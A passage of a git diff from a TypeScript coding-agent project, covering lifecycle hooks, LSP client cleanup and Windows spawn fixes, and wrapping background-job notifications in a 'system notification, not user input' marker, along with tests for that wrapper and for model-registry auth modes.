LifecycleHookPhase, + context: LifecycleHookContext, +): Promise { + try { + let module = _legacyModuleCache.get(entryPath); + if (!module) { + module = await importExtensionModule>(import.meta.url, pathToFileURL(entryPath).href); + _legacyModuleCache.set(entryPath, module); + } + for (const exportName of getLegacyExportCandidates(phase)) { + const candidate = module[exportName]; + if (typeof candidate === "function") { + return candidate as LifecycleHookHandler; + } + } + return null; + } catch { + return null; + } +} + +export async function runLifecycleHooks( + loaded: LoadedLifecycleHooks | null, + phase: LifecycleHookPhase, +): Promise { + if (!loaded) { + return { + phase, + hooksRun: 0, + hookErrors: 0, + legacyHooksRun: 0, + entryPathCount: 0, + skipped: true, + }; + } + + const context: LifecycleHookContext = { + phase, + source: loaded.source, + installedPath: loaded.installedPath, + scope: loaded.scope, + cwd: loaded.cwd, + interactive: Boolean(process.stdin.isTTY && process.stdout.isTTY), + log: (message) => loaded.stdout.write(`${message}\n`), + warn: (message) => loaded.stderr.write(`${message}\n`), + error: (message) => loaded.stderr.write(`${message}\n`), + }; + + let hooksRun = 0; + let hookErrors = 0; + let legacyHooksRun = 0; + + for (const entryPath of loaded.entryPaths) { + const hookMap = loaded.hooksByPath.get(entryPath); + const registeredHooks = hookMap?.[phase] ?? []; + if (registeredHooks.length > 0) { + for (const hook of registeredHooks) { + hooksRun += 1; + const ok = await runHookSafe(hook, context, loaded.stderr); + if (!ok) hookErrors += 1; + } + continue; + } + + const legacyHook = await runLegacyExportHook(entryPath, phase, context); + if (!legacyHook) continue; + + legacyHooksRun += 1; + const ok = await runHookSafe(legacyHook, context, loaded.stderr); + if (!ok) hookErrors += 1; + } + + return { + phase, + hooksRun, + hookErrors, + legacyHooksRun, + entryPathCount: loaded.entryPaths.length, + skipped: false, + }; +} diff --git a/packages/pi-coding-agent/src/core/local-model-check.ts b/packages/pi-coding-agent/src/core/local-model-check.ts new file mode 100644 index 000000000..b468e459f --- /dev/null +++ b/packages/pi-coding-agent/src/core/local-model-check.ts @@ -0,0 +1,45 @@ +/** + * local-model-check.ts — Utility to detect if a model baseUrl is local. + * + * Leaf module with zero transitive dependencies on TypeScript parameter properties. + * Used by ModelRegistry and tests. + */ + +/** + * Check if a model's baseUrl points to a local endpoint. + * Returns true for localhost, 127.0.0.1, 0.0.0.0, ::1, or unix socket paths. + * Returns false if baseUrl is empty (cloud provider) or points to a remote host. + */ +export function isLocalModel(model: { baseUrl: string }): boolean { + const url = model.baseUrl; + if (!url) return false; + + // Unix socket paths + if (url.startsWith("unix://") || url.startsWith("unix:")) return true; + + try { + const parsed = new URL(url); + const hostname = parsed.hostname; + if ( + hostname === "localhost" || + hostname === "127.0.0.1" || + hostname === "0.0.0.0" || + hostname === "::1" || + hostname === "[::1]" + ) { + return true; + } + } catch { + // If URL parsing fails, check raw string for local patterns + if ( + url.includes("localhost") || + url.includes("127.0.0.1") || + url.includes("0.0.0.0") || + url.includes("[::1]") + ) { + return true; + } + } + + return false; +} diff --git a/packages/pi-coding-agent/src/core/lsp/client.ts b/packages/pi-coding-agent/src/core/lsp/client.ts index 930dc8374..400b2beb0 100644 --- a/packages/pi-coding-agent/src/core/lsp/client.ts +++ b/packages/pi-coding-agent/src/core/lsp/client.ts @@ -24,11 +24,25 @@ const clients = new Map(); const clientLocks = new Map>(); const fileOperationLocks = new Map>(); +/** Track stream listeners per client so they can be removed on shutdown. */ +interface StreamHandlers { + stdoutData?: (chunk: Buffer) => void; + stdoutEnd?: () => void; + stdoutError?: () => void; + stderrData?: (chunk: Buffer) => void; + stderrEnd?: () => void; + stderrError?: () => void; +} +const clientStreamHandlers = new Map(); + // Idle timeout configuration (disabled by default) let idleTimeoutMs: number | null = null; let idleCheckInterval: ReturnType | null = null; const IDLE_CHECK_INTERVAL_MS = 60 * 1000; +/** Maximum allowed size for the message buffer (10 MB). */ +const MAX_MESSAGE_BUFFER_SIZE = 10 * 1024 * 1024; + /** * Configure the idle timeout for LSP clients. */ @@ -52,6 +66,10 @@ function startIdleChecker(): void { shutdownClient(key); } } + // Stop the checker if there are no more clients to monitor + if (clients.size === 0) { + stopIdleChecker(); + } }, IDLE_CHECK_INTERVAL_MS); } @@ -250,8 +268,21 @@ async function startMessageReader(client: LspClient): Promise { } return new Promise((resolve) => { - stdout.on("data", async (chunk: Buffer) => { + const handlers = clientStreamHandlers.get(client.name) ?? {}; + + handlers.stdoutData = async (chunk: Buffer) => { const currentBuffer: Buffer = Buffer.concat([client.messageBuffer, chunk]); + + if (currentBuffer.length > MAX_MESSAGE_BUFFER_SIZE) { + if (process.env.DEBUG) { + console.error( + `[lsp] Message buffer exceeded ${MAX_MESSAGE_BUFFER_SIZE} bytes (${currentBuffer.length}), discarding`, + ); + } + client.messageBuffer = Buffer.alloc(0); + return; + } + client.messageBuffer = currentBuffer; let workingBuffer = currentBuffer; @@ -289,17 +320,22 @@ async function startMessageReader(client: LspClient): Promise { } client.messageBuffer = workingBuffer; - }); + }; + stdout.on("data", handlers.stdoutData); - stdout.on("end", () => { + handlers.stdoutEnd = () => { client.isReading = false; resolve(); - }); + }; + stdout.on("end", handlers.stdoutEnd); - stdout.on("error", () => { + handlers.stdoutError = () => { client.isReading = false; resolve(); - }); + }; + stdout.on("error", handlers.stdoutError); + + clientStreamHandlers.set(client.name, handlers); }); } @@ -384,21 +420,28 @@ async function startStderrReader(client: LspClient): Promise { if (!stderr) return; return new Promise((resolve) => { - stderr.on("data", (chunk: Buffer) => { + const handlers = clientStreamHandlers.get(client.name) ?? {}; + + handlers.stderrData = (chunk: Buffer) => { const text = chunk.toString("utf-8"); client.stderrBuffer += text; if (client.stderrBuffer.length > 4096) { client.stderrBuffer = client.stderrBuffer.slice(-4096); } - }); + }; + stderr.on("data", handlers.stderrData); - stderr.on("end", () => { + handlers.stderrEnd = () => { resolve(); - }); + }; + stderr.on("end", handlers.stderrEnd); - stderr.on("error", () => { + handlers.stderrError = () => { resolve(); - }); + }; + stderr.on("error", handlers.stderrError); + + clientStreamHandlers.set(client.name, handlers); }); } @@ -688,6 +731,23 @@ export function notifyFileChanged(filePath: string): void { } } +/** + * Remove stdout/stderr stream listeners for a client to prevent leaks. + */ +function removeStreamHandlers(client: LspClient): void { + const handlers = clientStreamHandlers.get(client.name); + if (!handlers) return; + + if (handlers.stdoutData) client.proc.stdout?.removeListener("data", handlers.stdoutData); + if (handlers.stdoutEnd) client.proc.stdout?.removeListener("end", handlers.stdoutEnd); + if (handlers.stdoutError) client.proc.stdout?.removeListener("error", handlers.stdoutError); + if (handlers.stderrData) client.proc.stderr?.removeListener("data", handlers.stderrData); + if (handlers.stderrEnd) client.proc.stderr?.removeListener("end", handlers.stderrEnd); + if (handlers.stderrError) client.proc.stderr?.removeListener("error", handlers.stderrError); + + clientStreamHandlers.delete(client.name); +} + /** * Shutdown a specific client by key. */ @@ -702,12 +762,23 @@ function shutdownClient(key: string): void { sendRequest(client, "shutdown", null).catch(() => {}); + // Remove stream listeners before killing the process + removeStreamHandlers(client); + try { killProcessTree(client.proc.pid); } catch { client.proc.kill(); } clients.delete(key); + clientLocks.delete(key); + + // Clean up any file operation locks associated with this client + for (const lockKey of Array.from(fileOperationLocks.keys())) { + if (lockKey.startsWith(`${key}:`)) { + fileOperationLocks.delete(lockKey); + } + } } // ============================================================================= @@ -822,6 +893,9 @@ async function sendNotification(client: LspClient, method: string, params: unkno function shutdownAll(): void { const clientsToShutdown = Array.from(clients.values()); clients.clear(); + clientLocks.clear(); + fileOperationLocks.clear(); + stopIdleChecker(); const err = new Error("LSP client shutdown"); for (const client of clientsToShutdown) { @@ -831,6 +905,9 @@ function shutdownAll(): void { pending.reject(err); } + // Remove stream listeners before killing the process + removeStreamHandlers(client); + void (async () => { const timeout = new Promise(resolve => setTimeout(resolve, 5_000)); const result = sendRequest(client, "shutdown", null).catch(() => {}); @@ -864,14 +941,28 @@ export function getActiveClients(): LspServerStatus[] { // Process Cleanup // ============================================================================= +const _beforeExitHandler = () => shutdownAll(); +const _sigintHandler = () => { + shutdownAll(); + process.exit(0); +}; +const _sigtermHandler = () => { + shutdownAll(); + process.exit(0); +}; + if (typeof process !== "undefined") { - process.on("beforeExit", shutdownAll); - process.on("SIGINT", () => { - shutdownAll(); - process.exit(0); - }); - process.on("SIGTERM", () => { - shutdownAll(); - process.exit(0); - }); + process.on("beforeExit", _beforeExitHandler); + process.on("SIGINT", _sigintHandler); + process.on("SIGTERM", _sigtermHandler); +} + +/** + * Remove process-level signal handlers registered at module load. + * Call this during graceful teardown to prevent leaked listeners. + */ +export function removeProcessHandlers(): void { + process.off("beforeExit", _beforeExitHandler); + process.off("SIGINT", _sigintHandler); + process.off("SIGTERM", _sigtermHandler); } diff --git a/packages/pi-coding-agent/src/core/lsp/config.ts b/packages/pi-coding-agent/src/core/lsp/config.ts index cc104be21..758657856 100644 --- a/packages/pi-coding-agent/src/core/lsp/config.ts +++ b/packages/pi-coding-agent/src/core/lsp/config.ts @@ -12,6 +12,11 @@ import type { ServerConfig } from "./types.js"; const require = createRequire(import.meta.url); const DEFAULTS = require("./defaults.json") as Record>; +/** Map legacy server keys to their current names so user overrides still merge. */ +const LEGACY_ALIASES: Record = { + "kotlin-language-server": "kotlin-lsp", +}; + export interface LspConfig { servers: Record; /** Idle timeout in milliseconds. If set, LSP clients will be shutdown after this period of inactivity. Disabled by default. */ @@ -109,7 +114,8 @@ function mergeServers( overrides: Record>, ): Record { const merged: Record = { ...base }; - for (const [name, config] of Object.entries(overrides)) { + for (const [rawName, config] of Object.entries(overrides)) { + const name = LEGACY_ALIASES[rawName] ?? rawName; if (merged[name]) { const candidate = { ...merged[name], ...config }; const normalized = normalizeServerConfig(name, candidate); diff --git a/packages/pi-coding-agent/src/core/lsp/defaults.json b/packages/pi-coding-agent/src/core/lsp/defaults.json index dbea73b6c..6bc16ba82 100644 --- a/packages/pi-coding-agent/src/core/lsp/defaults.json +++ b/packages/pi-coding-agent/src/core/lsp/defaults.json @@ -189,8 +189,8 @@ "fileTypes": [".java"], "rootMarkers": ["pom.xml", "build.gradle", "build.gradle.kts", "settings.gradle", ".project"] }, - "kotlin-language-server": { - "command": "kotlin-language-server", + "kotlin-lsp": { + "command": "kotlin-lsp", "args": [], "fileTypes": [".kt", ".kts"], "rootMarkers": ["build.gradle", "build.gradle.kts", "pom.xml", "settings.gradle", "settings.gradle.kts"] diff --git a/packages/pi-coding-agent/src/core/lsp/index.ts b/packages/pi-coding-agent/src/core/lsp/index.ts index 61237e7eb..bd2718634 100644 --- a/packages/pi-coding-agent/src/core/lsp/index.ts +++ b/packages/pi-coding-agent/src/core/lsp/index.ts @@ -340,6 +340,9 @@ async function runWorkspaceDiagnostics( const proc = spawn(cmd, cmdArgs, { cwd, stdio: ["ignore", "pipe", "pipe"], + // On Windows, project-type commands (tsc, cargo, etc.) may be .cmd + // wrappers that need shell resolution to avoid ENOENT/EINVAL (#2854). + shell: process.platform === "win32", }); const abortHandler = () => { proc.kill(); diff --git a/packages/pi-coding-agent/src/core/lsp/lsp-legacy-alias.test.ts b/packages/pi-coding-agent/src/core/lsp/lsp-legacy-alias.test.ts new file mode 100644 index 000000000..c1d4d99ec --- /dev/null +++ b/packages/pi-coding-agent/src/core/lsp/lsp-legacy-alias.test.ts @@ -0,0 +1,70 @@ +// GSD2 — Regression test for LSP legacy server key aliases +// Copyright (c) 2026 Jeremy McSpadden + +/** + * When a default server key is renamed (e.g., kotlin-language-server → kotlin-lsp), + * user overrides referencing the old key must still merge correctly via LEGACY_ALIASES. + * + * This test exercises the merge path through loadConfig() with a temp project + * containing an lsp.json that uses the legacy key. + */ + +import { describe, it, beforeEach, afterEach } from "node:test"; +import assert from "node:assert/strict"; +import * as fs from "node:fs"; +import * as path from "node:path"; +import * as os from "node:os"; +import { loadConfig } from "./config.js"; + +describe("LSP legacy server key aliases", () => { + let tmpDir: string; + + beforeEach(() => { + tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), "lsp-alias-test-")); + }); + + afterEach(() => { + fs.rmSync(tmpDir, { recursive: true, force: true }); + }); + + it("merges user override with legacy key 'kotlin-language-server' into 'kotlin-lsp'", () => { + // Write an lsp.json that uses the old key name with a command that exists (node) + // so resolveCommand doesn't filter it out. + const overrideConfig = { + servers: { + "kotlin-language-server": { + command: "node", + }, + }, + }; + fs.writeFileSync( + path.join(tmpDir, "lsp.json"), + JSON.stringify(overrideConfig), + ); + + // Also add root markers so the server is detected + fs.writeFileSync(path.join(tmpDir, "build.gradle.kts"), ""); + + const config = loadConfig(tmpDir); + + // The merged config should have kotlin-lsp (new key) with the user's command override + const kotlinServer = config.servers["kotlin-lsp"]; + assert.ok(kotlinServer, "kotlin-lsp should exist in merged config"); + assert.equal( + kotlinServer.command, + "node", + "command should be overridden from user config via legacy alias", + ); + assert.ok( + kotlinServer.fileTypes.includes(".kt"), + "fileTypes should be inherited from defaults", + ); + + // The old key should NOT appear as a separate entry + assert.equal( + config.servers["kotlin-language-server"], + undefined, + "legacy key should not appear as separate server", + ); + }); +}); diff --git a/packages/pi-coding-agent/src/core/lsp/lspmux.ts b/packages/pi-coding-agent/src/core/lsp/lspmux.ts index 05ef13b38..6e01d7807 100644 --- a/packages/pi-coding-agent/src/core/lsp/lspmux.ts +++ b/packages/pi-coding-agent/src/core/lsp/lspmux.ts @@ -90,6 +90,9 @@ async function checkServerRunning(binaryPath: string): Promise { try { const proc = spawn(binaryPath, ["status"], { stdio: ["ignore", "pipe", "pipe"], + // On Windows, the binary may be a .cmd wrapper requiring shell + // resolution to avoid ENOENT/EINVAL (#2854). + shell: process.platform === "win32", }); const exited = await Promise.race([ diff --git a/packages/pi-coding-agent/src/core/messages.test.ts b/packages/pi-coding-agent/src/core/messages.test.ts new file mode 100644 index 000000000..6741da93c --- /dev/null +++ b/packages/pi-coding-agent/src/core/messages.test.ts @@ -0,0 +1,114 @@ +/** + * messages.test.ts — Tests for convertToLlm custom message handling. + * + * Reproduction test for #3026: background job completion notifications + * delivered as custom messages must be clearly distinguishable from + * user-typed input when converted to LLM messages. + */ + +import test from "node:test"; +import assert from "node:assert/strict"; +import { convertToLlm, type CustomMessage } from "./messages.js"; + +/** Extract the first content block from a message, asserting array content. */ +function firstTextBlock(msg: ReturnType[number]) { + const { content } = msg; + assert.ok(Array.isArray(content), "Expected content to be an array"); + const block = content[0]; + assert.ok(typeof block === "object" && block !== null, "Expected first block to be an object"); + return block; +} + +test("convertToLlm wraps custom messages with system notification prefix", () => { + const customMsg: CustomMessage = { + role: "custom", + customType: "async_job_result", + content: "**Background job done: bg_abc123** (sleep 2, 2.1s)\n\ndone", + display: true, + timestamp: Date.now(), + }; + + const result = convertToLlm([customMsg]); + assert.equal(result.length, 1); + assert.equal(result[0].role, "user"); + + // The content must include a system notification wrapper so the LLM + // does not confuse it with user input (#3026). + const text = firstTextBlock(result[0]); + assert.equal(text.type, "text"); + assert.ok( + "text" in text && text.text.includes("[system notification"), + "Custom message should be wrapped with system notification marker", + ); +}); + +test("convertToLlm wraps custom messages with array content", () => { + const customMsg: CustomMessage = { + role: "custom", + customType: "bg-shell-status", + content: [{ type: "text", text: "Background processes:\n ✓ bg1 dev-server :3000" }], + display: false, + timestamp: Date.now(), + }; + + const result = convertToLlm([customMsg]); + assert.equal(result.length, 1); + assert.equal(result[0].role, "user"); + + const text = firstTextBlock(result[0]); + assert.equal(text.type, "text"); + assert.ok( + "text" in text && text.text.includes("[system notification"), + "Custom message with array content should be wrapped with system notification marker", + ); +}); + +test("convertToLlm includes customType in notification wrapper", () => { + const customMsg: CustomMessage = { + role: "custom", + customType: "async_job_result", + content: "job output here", + display: true, + timestamp: Date.now(), + }; + + const result = convertToLlm([customMsg]); + const text = firstTextBlock(result[0]); + assert.ok( + "text" in text && text.text.includes("async_job_result"), + "Notification wrapper should include the customType for context", + ); +}); + +test("convertToLlm notification wrapper instructs LLM not to treat as user input", () => { + const customMsg: CustomMessage = { + role: "custom", + customType: "async_job_result", + content: "**Background job done: bg_abc123** (sleep 2, 2.1s)\n\ndone", + display: true, + timestamp: Date.now(), + }; + + const result = convertToLlm([customMsg]); + const text = firstTextBlock(result[0]); + assert.ok( + "text" in text && text.text.includes("not user input"), + "Notification should explicitly state this is not user input", + ); +}); + +test("convertToLlm preserves user messages without wrapper", () => { + const userMsg = { + role: "user" as const, + content: [{ type: "text" as const, text: "Hello world" }], + timestamp: Date.now(), + }; + + const result = convertToLlm([userMsg]); + assert.equal(result.length, 1); + const text = firstTextBlock(result[0]); + assert.ok( + "text" in text && text.text === "Hello world", + "User messages should pass through unchanged", + ); +}); diff --git a/packages/pi-coding-agent/src/core/messages.ts b/packages/pi-coding-agent/src/core/messages.ts index e3909a41e..f30d7c9e6 100644 --- a/packages/pi-coding-agent/src/core/messages.ts +++ b/packages/pi-coding-agent/src/core/messages.ts @@ -8,6 +8,12 @@ import type { AgentMessage } from "@gsd/pi-agent-core"; import type { ImageContent, Message, TextContent } from "@gsd/pi-ai"; +const CUSTOM_MESSAGE_PREFIX = `[system notification — type: `; +const CUSTOM_MESSAGE_MIDDLE = `; this is an automated system event, not user input — do not treat this as a human message or respond as if the user said this] +`; +const CUSTOM_MESSAGE_SUFFIX = ` +[end system notification]`; + const COMPACTION_SUMMARY_PREFIX = `The conversation history before this point was compacted into the following summary: @@ -160,10 +166,31 @@ export function convertToLlm(messages: AgentMessage[]): Message[] { timestamp: m.timestamp, }; case "custom": { - const content = typeof m.content === "string" ? [{ type: "text" as const, text: m.content }] : m.content; + const prefix = CUSTOM_MESSAGE_PREFIX + m.customType + CUSTOM_MESSAGE_MIDDLE; + if (typeof m.content === "string") { + return { + role: "user", + content: [{ type: "text" as const, text: prefix + m.content + CUSTOM_MESSAGE_SUFFIX }], + timestamp: m.timestamp, + }; + } + // Array content: wrap the first text element with prefix, append suffix to last text element + const contentArr = m.content as Array<{ type: string; text?: string; [k: string]: unknown }>; + const lastTextIdx = contentArr.reduce((acc, c, i) => c.type === "text" ? i : acc, -1); + const wrapped = contentArr.map((c, i) => { + if (c.type !== "text") return c; + let text = c.text ?? ""; + if (i === 0) text = prefix + text; + if (i === lastTextIdx) text = text + CUSTOM_MESSAGE_SUFFIX; + return { ...c, text }; + }); + // If no text elements exist, prepend one with the wrapper + if (lastTextIdx === -1) { + wrapped.unshift({ type: "text" as const, text: prefix + CUSTOM_MESSAGE_SUFFIX }); + } return { role: "user", - content, + content: wrapped as typeof m.content, timestamp: m.timestamp, }; } diff --git a/packages/pi-coding-agent/src/core/model-registry-auth-mode.test.ts b/packages/pi-coding-agent/src/core/model-registry-auth-mode.test.ts new file mode 100644 index 000000000..be27f6c60 --- /dev/null +++ b/packages/pi-coding-agent/src/core/model-registry-auth-mode.test.ts @@ -0,0 +1,644 @@ +import assert from "node:assert/strict"; +import { describe, it } from "node:test"; +import type { Api, Model, SimpleStreamOptions, Context, AssistantMessageEventStream } from "@gsd/pi-ai"; +import { getApiProvider } from "@gsd/pi-ai"; +import type { AuthStorage } from "./auth-storage.js"; +import { ModelRegistry } from "./model-registry.js"; + +function createRegistry(hasAuthFn?: (provider: string) => boolean): ModelRegistry { + const authStorage = { + setFallbackResolver: () => {}, + onCredentialChange: () => {}, + getOAuthProviders: () => [], + get: () => undefined, + hasAuth: hasAuthFn ?? (() => false), + getApiKey: async () => undefined, + } as unknown as AuthStorage; + + return new ModelRegistry(authStorage, undefined); +} + +function createProviderModel(id: string, api?: string): NonNullable[1]["models"]>[number] { + return { + id, + name: id, + api: (api ?? "openai-completions") as Api, + reasoning: false, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 128000, + maxTokens: 16384, + }; +} + +function findModel(registry: ModelRegistry, provider: string, id: string): Model | undefined { + return registry.getAvailable().find((m) => m.provider === provider && m.id === id); +} + +function makeModel(provider: string, id: string, api: string): Model { + return { + id, + name: id, + api: api as Api, + provider, + baseUrl: `${provider}:`, + reasoning: false, + input: ["text"], + cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 }, + contextWindow: 128000, + maxTokens: 16384, + }; +} + +function makeContext(): Context { + return { + systemPrompt: "test", + messages: [{ role: "user", content: "hello", timestamp: Date.now() }], + }; +} + +/** No-op streamSimple for tests that need one to pass validation but don't inspect it. */ +const noopStreamSimple = (_model: Model, _context: Context, _options?: SimpleStreamOptions) => { + return { + [Symbol.asyncIterator]() { return { next: async () => ({ value: undefined, done: true as const }) }; }, + result: () => Promise.resolve({ role: "assistant" as const, content: [], api: "test" as Api, provider: "test", model: "test", usage: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, totalTokens: 0, cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 } }, stopReason: "stop" as const, timestamp: Date.now() }), + push: () => {}, + end: () => {}, + } as unknown as AssistantMessageEventStream; +}; + +/** Create a spy streamSimple that captures the options it receives and returns a stub stream. */ +function createStreamSpy(): { + streamSimple: (model: Model, context: Context, options?: SimpleStreamOptions) => AssistantMessageEventStream; + getCapturedOptions: () => SimpleStreamOptions | undefined; +} { + let capturedOptions: SimpleStreamOptions | undefined; + const streamSimple = (_model: Model, _context: Context, options?: SimpleStreamOptions) => { + capturedOptions = options; + // Return a minimal stub that satisfies AssistantMessageEventStream + return { + [Symbol.asyncIterator]() { return { next: async () => ({ value: undefined, done: true as const }) }; }, + result: () => Promise.resolve({ role: "assistant" as const, content: [], api: "test" as Api, provider: "test", model: "test", usage: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, totalTokens: 0, cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 } }, stopReason: "stop" as const, timestamp: Date.now() }), + push: () => {}, + end: () => {}, + } as unknown as AssistantMessageEventStream; + }; + return { streamSimple, getCapturedOptions: () => capturedOptions }; +} + +// ─── Registration ───────────────────────────────────────────────────────────── + +describe("ModelRegistry authMode — registration", () => { + it("registers externalCli provider with streamSimple and without apiKey/oauth", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + assert.doesNotThrow(() => { + registry.registerProvider("cli-provider", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: spy.streamSimple, + models: [createProviderModel("cli-model")], + }); + }); + }); + + it("registers none provider with streamSimple and without apiKey/oauth", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + assert.doesNotThrow(() => { + registry.registerProvider("none-provider", { + authMode: "none", + baseUrl: "http://localhost:11434", + api: "openai-completions", + streamSimple: spy.streamSimple, + models: [createProviderModel("local-model")], + }); + }); + }); + + it("rejects apiKey provider without apiKey or oauth — message mentions authMode", () => { + const registry = createRegistry(); + assert.throws(() => { + registry.registerProvider("apikey-provider", { + authMode: "apiKey", + baseUrl: "https://api.local", + api: "openai-completions", + models: [createProviderModel("model")], + }); + }, (err: Error) => { + assert.ok(err.message.includes("authMode"), "error message must mention authMode"); + assert.ok(err.message.includes("externalCli"), "error message must suggest externalCli"); + return true; + }); + }); + + it("rejects provider with no authMode and no apiKey/oauth (defaults to apiKey)", () => { + const registry = createRegistry(); + assert.throws(() => { + registry.registerProvider("bare-provider", { + baseUrl: "https://api.local", + api: "openai-completions", + models: [createProviderModel("model")], + }); + }, (err: Error) => { + assert.ok(err.message.includes("authMode"), "error message must mention authMode"); + return true; + }); + }); + + it("rejects externalCli provider without streamSimple", () => { + const registry = createRegistry(); + assert.throws(() => { + registry.registerProvider("cli-no-stream", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + models: [createProviderModel("model")], + }); + }, (err: Error) => { + assert.ok(err.message.includes("streamSimple"), "error message must mention streamSimple"); + assert.ok(err.message.includes("externalCli"), "error message must mention authMode"); + return true; + }); + }); + + it("rejects none provider without streamSimple", () => { + const registry = createRegistry(); + assert.throws(() => { + registry.registerProvider("none-no-stream", { + authMode: "none", + baseUrl: "http://localhost:11434", + api: "openai-completions", + models: [createProviderModel("model")], + }); + }, (err: Error) => { + assert.ok(err.message.includes("streamSimple"), "error message must mention streamSimple"); + assert.ok(err.message.includes("none"), "error message must mention authMode"); + return true; + }); + }); + + it("rejects externalCli provider that also sets apiKey", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + assert.throws(() => { + registry.registerProvider("cli-with-key", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + apiKey: "SHOULD_NOT_EXIST", + streamSimple: spy.streamSimple, + models: [createProviderModel("model")], + }); + }, (err: Error) => { + assert.ok(err.message.includes("apiKey"), "error message must mention apiKey"); + assert.ok(err.message.includes("externalCli"), "error message must mention authMode"); + return true; + }); + }); + + it("rejects none provider that also sets apiKey", () => { + const registry = createRegistry(); + const spy = createStreamSpy(); + assert.throws(() => { + registry.registerProvider("none-with-key", { + authMode: "none", + baseUrl: "http://localhost:11434", + api: "openai-completions", + apiKey: "SHOULD_NOT_EXIST", + streamSimple: spy.streamSimple, + models: [createProviderModel("model")], + }); + }, (err: Error) => { + assert.ok(err.message.includes("apiKey"), "error message must mention apiKey"); + assert.ok(err.message.includes("none"), "error message must mention authMode"); + return true; + }); + }); +}); + +// ─── getProviderAuthMode ────────────────────────────────────────────────────── + +describe("ModelRegistry authMode — getProviderAuthMode", () => { + it("returns apiKey for unregistered (built-in) providers", () => { + const registry = createRegistry(); + assert.equal(registry.getProviderAuthMode("anthropic"), "apiKey"); + }); + + it("returns explicit authMode when set", () => { + const registry = createRegistry(); + registry.registerProvider("cli", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("m")], + }); + assert.equal(registry.getProviderAuthMode("cli"), "externalCli"); + }); + + it("returns none when authMode is none", () => { + const registry = createRegistry(); + registry.registerProvider("local", { + authMode: "none", + baseUrl: "http://localhost:11434", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("m")], + }); + assert.equal(registry.getProviderAuthMode("local"), "none"); + }); +}); + +// ─── isProviderRequestReady ─────────────────────────────────────────────────── + +describe("ModelRegistry authMode — isProviderRequestReady", () => { + it("returns true for externalCli without stored auth", () => { + const registry = createRegistry(() => false); + registry.registerProvider("cli", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("m")], + }); + assert.equal(registry.isProviderRequestReady("cli"), true); + }); + + it("returns true for none without stored auth", () => { + const registry = createRegistry(() => false); + registry.registerProvider("local", { + authMode: "none", + baseUrl: "http://localhost:11434", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("m")], + }); + assert.equal(registry.isProviderRequestReady("local"), true); + }); + + it("returns false for apiKey provider without stored auth", () => { + const registry = createRegistry(() => false); + assert.equal(registry.isProviderRequestReady("anthropic"), false); + }); + + it("returns true for apiKey provider with stored auth", () => { + const registry = createRegistry(() => true); + assert.equal(registry.isProviderRequestReady("anthropic"), true); + }); +}); + +// ─── isReady callback ───────────────────────────────────────────────────────── + +describe("ModelRegistry authMode — isReady callback", () => { + it("calls isReady and returns its result for externalCli provider", () => { + const registry = createRegistry(() => false); + registry.registerProvider("cli-down", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: noopStreamSimple, + isReady: () => false, + models: [createProviderModel("m")], + }); + assert.equal(registry.isProviderRequestReady("cli-down"), false); + }); + + it("calls isReady for apiKey provider (overrides hasAuth)", () => { + const registry = createRegistry(() => true); + registry.registerProvider("strict-provider", { + apiKey: "MY_KEY", + baseUrl: "https://api.local", + api: "openai-completions", + isReady: () => false, + models: [createProviderModel("m")], + }); + assert.equal(registry.isProviderRequestReady("strict-provider"), false); + }); + + it("isReady returning true makes provider available", () => { + const registry = createRegistry(() => false); + registry.registerProvider("healthy-cli", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: noopStreamSimple, + isReady: () => true, + models: [createProviderModel("m")], + }); + assert.equal(registry.isProviderRequestReady("healthy-cli"), true); + }); + + it("falls through to default behavior when isReady not provided", () => { + const registry = createRegistry(() => false); + registry.registerProvider("no-callback", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("m")], + }); + // externalCli without isReady → true (default) + assert.equal(registry.isProviderRequestReady("no-callback"), true); + }); +}); + +// ─── getAvailable ───────────────────────────────────────────────────────────── + +describe("ModelRegistry authMode — getAvailable", () => { + it("includes externalCli models without stored auth", () => { + const registry = createRegistry(() => false); + registry.registerProvider("cli", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("cli-model")], + }); + assert.ok(findModel(registry, "cli", "cli-model")); + }); + + it("includes none models without stored auth", () => { + const registry = createRegistry(() => false); + registry.registerProvider("local", { + authMode: "none", + baseUrl: "http://localhost:11434", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("local-model")], + }); + assert.ok(findModel(registry, "local", "local-model")); + }); + + it("excludes externalCli models when isReady returns false", () => { + const registry = createRegistry(() => false); + registry.registerProvider("cli-down", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: noopStreamSimple, + isReady: () => false, + models: [createProviderModel("m")], + }); + assert.equal(findModel(registry, "cli-down", "m"), undefined); + }); + + it("excludes apiKey models without stored auth", () => { + const registry = createRegistry(() => false); + const available = registry.getAvailable(); + assert.equal(available.length, 0); + }); +}); + +// ─── getApiKey ──────────────────────────────────────────────────────────────── + +describe("ModelRegistry authMode — getApiKey", () => { + it("returns undefined for externalCli provider", async () => { + const registry = createRegistry(); + registry.registerProvider("cli", { + authMode: "externalCli", + baseUrl: "https://cli.local", + api: "openai-completions", + streamSimple: noopStreamSimple, + models: [createProviderModel("m")], + }); 